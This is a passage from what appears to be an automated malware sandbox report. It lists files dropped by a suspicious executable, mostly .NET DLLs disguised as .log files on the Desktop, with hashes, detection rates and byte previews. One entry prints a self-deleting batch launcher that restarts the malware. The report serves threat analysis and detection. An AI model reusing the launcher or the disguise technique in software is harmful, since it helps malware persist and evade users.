                                                  SHA-512:1C755A0B0598BCE690B712E60399CE589C3D2EA3ED917BBD8486FBE7BEFA0141EE9EFC24038515F3AB4F608B09FB91E456196CBAF647CED17DB0BB516432D23E
                                                  Malicious:false
                                                  Preview:khIO84k3JlELzt0sJz3urH9iU

                                                  C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):183
                                                  Entropy (8bit):5.299203482443155
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+wzTQyr/rItBvBktKcKZG10nacwRE2J5xAIKoHK:hCRLuVFOOr+DE1wQTr/cTvKOZG1cNwi/
                                                  MD5:CD5BF7CE70DA0F3CFF468DE9845C5E2D
                                                  SHA1:F0AE962C97C597C83C73535D3856DC2E1B498BAD
                                                  SHA-256:1C8426824FF0971782CD389E1E1379CAA11566CFD99B78B775B7F4BCEE0F3F9A
                                                  SHA-512:FAF71B5DC168DDFA8B13F4D52EF26418F9F553F056A52396EE141B950F9DF6733CAA4E7DD1941FBC586BBC9FF001D202C716B53488039D5B040CFAA6FBA423F0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yJr0BespZg.bat"

                                                  C:\Users\user\Desktop\ACAUZvYN.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Joe Sandbox View:
                                                  • Filename: T0jSGXdxX5.exe, Detection: malicious, Browse
                                                  • Filename: main.exe, Detection: malicious, Browse
                                                  • Filename: file_1443.exe, Detection: malicious, Browse
                                                  • Filename: lsass.exe, Detection: malicious, Browse
                                                  • Filename: t8xf0Y1ovi.exe, Detection: malicious, Browse
                                                  • Filename: dvc2TBOZTh.exe, Detection: malicious, Browse
                                                  • Filename: teh76E2k50.exe, Detection: malicious, Browse
                                                  • Filename: FuWRu2Mg82.exe, Detection: malicious, Browse
                                                  • Filename: auXl1Tzyme.exe, Detection: malicious, Browse
                                                  • Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\AHwNgZaF.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ARClkDgk.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\AWvLLWqc.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\BXwkEeIS.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\CGsDyrOn.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\CKTJbAfr.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\CnRDnDvx.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\CqTJEOHT.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\CvAVSmWD.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\CyIkUInh.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\EZPbybNn.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FCcCDjRB.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FTyBLKyM.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FvOMJVpt.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FxClgbOG.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\GKfLNjlY.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\GLOjgbXG.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\GoybbFob.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
